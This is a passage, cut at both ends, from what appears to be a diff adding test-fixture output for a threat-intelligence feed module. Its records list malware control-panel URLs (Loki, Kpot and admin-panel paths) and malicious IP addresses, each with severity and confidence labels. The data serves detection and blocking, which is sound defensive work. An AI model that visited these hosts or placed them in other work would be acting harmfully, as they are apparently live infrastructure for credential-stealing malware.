"threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 16606, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332323; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-65" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:02.807Z", + "threatintel.anomali.name": "mal_url: http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:02.807Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "deliciasdvally.com.pe", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://deliciasdvally.com.pe/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/includes/gter/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 17261, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332399; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:24.810Z", + "threatintel.anomali.name": "mal_url: http://nkpotu.xyz/Kpot1/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://nkpotu.xyz/Kpot1/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:24.810Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "nkpotu.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://nkpotu.xyz/Kpot1/login.php", + "threatintel.indicator.url.path": "/Kpot1/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 17841, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332328; iType: mal_ip; State: active; Org: RUCloud; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:41.158Z", + "threatintel.anomali.name": "mal_ip: 194.87.147.80", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '194.87.147.80']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:41.158Z", + "threatintel.indicator.ip": "194.87.147.80", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 18385, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332377; iType: mal_url; State: active; Org: A100 ROW GmbH; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-85" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:57.189Z", + "threatintel.anomali.name": "mal_url: http://35.158.92.3/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://35.158.92.3/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:57.189Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "35.158.92.3", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://35.158.92.3/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 18973, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332101; iType: mal_ip; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-42" + ], + "threatintel.anomali.modified": "2020-01-22T03:01:57.279Z", + "threatintel.anomali.name": "mal_ip: 45.95.168.70", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '45.95.168.70']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:01:57.279Z", + "threatintel.indicator.ip": "45.95.168.70", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 19501, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332357; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:02:50.570Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:02:50.570Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work7/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 20107, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332289; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-26" + ], + "threatintel.anomali.modified": "2020-01-22T03:02:52.496Z", + "threatintel.anomali.name": "mal_url: http://f0391600.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0391600.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:02:52.496Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0391600.xsph.ru", + "threatintel.indicator.url.original": "http://f0391600.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 20722, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332334; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-94" + ], + "threatintel.anomali.modified": "2020-01-22T03:03:42.819Z", + "threatintel.anomali.name": "mal_url: http://extraclick.space/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://extraclick.space/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:03:42.819Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "extraclick.space", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://extraclick.space/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 21304, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332326; iType: mal_url; State: active; Org: RUCloud; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-87" + ], + "threatintel.anomali.modified": "2020-01-22T03:03:52.044Z", + "threatintel.anomali.name": "mal_url: http://petrogarmani.pw/login.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://petrogarmani.pw/login.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:03:52.044Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "petrogarmani.pw", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://petrogarmani.pw/login.php", + "threatintel.indicator.url.path": "/login.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 21882, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332311; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-68" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:01.650Z", + "threatintel.anomali.name": "mal_url: http://worldatdoor.in/mighty/32/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://worldatdoor.in/mighty/32/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:01.650Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "worldatdoor.in", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://worldatdoor.in/mighty/32/panel/admin.php", + "threatintel.indicator.url.path": "/mighty/32/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 22491, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332341; iType: mal_url; State: active; Org: Institute of Philosophy, Russian Academy of Scienc; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-92" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:32.717Z", + "threatintel.anomali.name": "mal_url: http://zanlma.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://zanlma.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:32.717Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "zanlma.com", + "threatintel.indicator.url.original": "http://zanlma.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 23094, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332303; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-84" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:56.858Z", + "threatintel.anomali.name": "mal_url: http://f0369688.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0369688.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:56.858Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0369688.xsph.ru", + "threatintel.indicator.url.original": "http://f0369688.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 23709, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55241332380; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-76" + ], + "threatintel.anomali.modified": "2020-01-22T03:04:59.245Z", + "threatintel.anomali.name": "mal_url: http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-22T03:04:59.245Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "chol.cc", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://chol.cc/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Work2/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 24318, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868747; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-57" + ], + "threatintel.anomali.modified": "2020-01-23T03:00:22.287Z", + "threatintel.anomali.name": "mal_ip: 192.185.214.199", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '192.185.214.199']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:00:22.287Z", + "threatintel.indicator.ip": "192.185.214.199", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 24871, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868770; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-24" + ], + "threatintel.anomali.modified": "2020-01-23T03:01:11.329Z", + "threatintel.anomali.name": "mal_url: http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:01:11.329Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "softtouchcollars.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://softtouchcollars.com/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/Loki/Panel/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 25529, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868769; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-61" + ], + "threatintel.anomali.modified": "2020-01-23T03:01:36.682Z", + "threatintel.anomali.name": "mal_url: http://imobiliariatirol.com/gh/panelnew/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://imobiliariatirol.com/gh/panelnew/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:01:36.682Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "imobiliariatirol.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://imobiliariatirol.com/gh/panelnew/admin.php", + "threatintel.indicator.url.path": "/gh/panelnew/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 26146, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868772; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-93" + ], + "threatintel.anomali.modified": "2020-01-23T03:02:15.854Z", + "threatintel.anomali.name": "mal_url: http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:02:15.854Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "deliveryexpressworld.xyz", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://deliveryexpressworld.xyz/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.path": "/five/PvqDq929BSx_A_D_M1n_a.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 26788, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868766; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-62" + ], + "threatintel.anomali.modified": "2020-01-23T03:02:47.364Z", + "threatintel.anomali.name": "mal_url: http://f0392261.xsph.ru/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0392261.xsph.ru/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:02:47.364Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0392261.xsph.ru", + "threatintel.indicator.url.original": "http://f0392261.xsph.ru/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 27403, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-80" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:05.048Z", + "threatintel.anomali.name": "mal_url: http://104.168.99.168/panel/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://104.168.99.168/panel/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:05.048Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "104.168.99.168", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://104.168.99.168/panel/panel/admin.php", + "threatintel.indicator.url.path": "/panel/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 28008, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-69" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:15.734Z", + "threatintel.anomali.name": "mal_url: http://f0387404.xsph.ru/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://f0387404.xsph.ru/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:15.734Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "f0387404.xsph.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://f0387404.xsph.ru/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 28643, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-72" + ], + "threatintel.anomali.modified": "2020-01-23T03:03:42.599Z", + "threatintel.anomali.name": "mal_url: http://a0386457.xsph.ru/panel/admin.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://a0386457.xsph.ru/panel/admin.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-23T03:03:42.599Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "a0386457.xsph.ru", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://a0386457.xsph.ru/panel/admin.php", + "threatintel.indicator.url.path": "/panel/admin.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 29278, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-74" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.821Z", + "threatintel.anomali.name": "mal_url: http://defenseisrael.com/dis/index.php", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://defenseisrael.com/dis/index.php']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.821Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "defenseisrael.com", + "threatintel.indicator.url.extension": "php", + "threatintel.indicator.url.original": "http://defenseisrael.com/dis/index.php", + "threatintel.indicator.url.path": "/dis/index.php", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 29854, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-83" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.857Z", + "threatintel.anomali.name": "mal_ip: 91.215.170.249", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[ipv4-addr:value = '91.215.170.249']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.857Z", + "threatintel.indicator.ip": "91.215.170.249", + "threatintel.indicator.type": "ipv4-addr" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 30419, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", + "threatintel.anomali.labels": [ + "malicious-activity", + "threatstream-severity-medium", + "threatstream-confidence-79" + ], + "threatintel.anomali.modified": "2020-01-24T02:57:04.883Z", + "threatintel.anomali.name": "mal_url: http://lbfb3f03.justinstalledpanel.com/login", + "threatintel.anomali.object_marking_refs": [ + "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" + ], + "threatintel.anomali.pattern": "[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']", + "threatintel.anomali.type": "indicator", + "threatintel.anomali.valid_from": "2020-01-24T02:57:04.883Z", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "lbfb3f03.justinstalledpanel.com", + "threatintel.indicator.url.original": "http://lbfb3f03.justinstalledpanel.com/login", + "threatintel.indicator.url.path": "/login", + "threatintel.indicator.url.scheme": "http" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.anomali", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "anomali", + "input.type": "log", + "log.offset": 31024, + "service.type": "threatintel", + "tags": [ + "threatintel-anomali", + "forwarded" + ], + "threatintel.anomali.description": "TS 